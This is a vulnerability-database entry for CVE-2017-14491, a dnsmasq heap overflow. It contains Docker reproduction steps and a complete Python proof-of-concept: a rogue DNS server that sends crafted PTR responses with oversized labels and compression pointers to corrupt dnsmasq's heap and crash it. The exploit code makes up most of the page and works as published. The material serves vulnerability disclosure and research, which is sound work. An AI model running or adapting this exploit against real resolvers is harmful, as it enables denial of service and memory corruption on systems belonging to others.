Dnsmasq Heap based overflow(CVE-2017-14491)

2017-10-0900:00:00

Root

www.seebug.org

205

0.357 Low

EPSS

Percentile

96.7%

JSON

1) Build the docker and open three terminals

docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it &lt;container_id&gt; bash
docker exec -it &lt;container_id&gt; bash

2) On one terminal let’s launch attacker controlled DNS server:

# python poc.py  127.0.0.2 53
Listening at 127.0.0.2:53

On another terminal let’s launch dnsmasq forwarding queries to attacker controlled DNS:

# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq: using nameserver 127.0.0.2#53
dnsmasq: cleared cache

4) Let’s fake a client making a request twice (or more) so we hit the dnsmasq cache:

# dig @localhost -p 53535 -x 8.8.8.125 &gt; /dev/null
# dig @localhost -p 53535 -x 8.8.8.125 &gt; /dev/null

5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.


                                                #!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
#  Fermin J. Serna <[email protected]>
#  Felix Wilhelm <[email protected]>
#  Gabriel Campana <[email protected]>
#  Kevin Hamacher <[email protected]>
#  Gynvael Coldwind <[email protected]>
#  Ron Bowes - Xoogler :/

import socket
import struct
import sys

def dw(x):
  return struct.pack('>H', x)

def udp_handler(sock_udp):

  data, addr = sock_udp.recvfrom(1024)
  print '[UDP] Total Data len recv ' + str(len(data))
  id = struct.unpack('>H', data[0:2])[0]
  query = data[12:]

  data = dw(id)                        # id
  data += dw(0x85a0)                   # flags
  data += dw(1)                        # questions
  data += dw(0x52)                     # answers
  data += dw(0)                        # authoritative
  data += dw(0)                        # additional

  # Add the question back - we're just hardcoding it
  data += ('\x03125\x018\x018\x018\x07in-addr\x04arpa\x00' +
           '\x00\x0c' + # type = 'PTR'
           '\x00\x01')   # cls = 'IN'

  # Add the first answer
  data += ('\xc0\x0c' + # ptr to the name
           '\x00\x0c' + # type = 'PTR'
           '\x00\x01' + # cls = 'IN'
           '\x00\x00\x00\x3d' + # ttl
           '\x04\x00' + # size of this resource record
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x3e' + 'Z'*62 +
           '\x0e' + 'Z'*14 +
           '\x00')

  # Add the next answer, which is written out in full
  data += ('\xc0\x0c' + # ptr to the name
           '\x00\x0c' + # type = 'PTR'
           '\x00\x01' + # cls = 'IN'
           '\x00\x00\x00\x3d' + # ttl
           '\x00\x26' + # size of this resource record
           '\x08DCBBEEEE\x04DDDD\x08CCCCCCCC\x04AAAA\x04BBBB\x03com\x00')

  for _ in range(79):
    data += ('\xc0\x0c' + # ptr to the name
             '\x00\x0c' + # type = 'PTR'
             '\x00\x01' + # cls = 'IN'
             '\x00\x00\x00\x3d' + # ttl
             '\x00\x02' + # size of the compressed resource record
             '\xc4\x40')   # pointer to the second record's name

  data += ('\xc0\x0c' + # ptr to the name
           '\x00\x0c' + # type = 'PTR'
           '\x00\x01' + # cls = 'IN'
           '\x00\x00\x00\x3d' + # ttl
           '\x00\x11' + # size of this resource record
           '\x04EEEE\x09DAABBEEEE\xc4\x49')

  sock_udp.sendto(data, addr)

if __name__ == '__main__':

  if len(sys.argv) != 3:
    print 'Usage: %s <ip> <port>\n' % sys.argv[0]
    sys.exit(0)

  ip = sys.argv[1]
  port = int(sys.argv[2])

  sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  sock_udp.bind((ip, port))
  print 'Listening at %s:%d\n' % (ip, port)

  while True:
    udp_handler(sock_udp)

  sock_udp.close()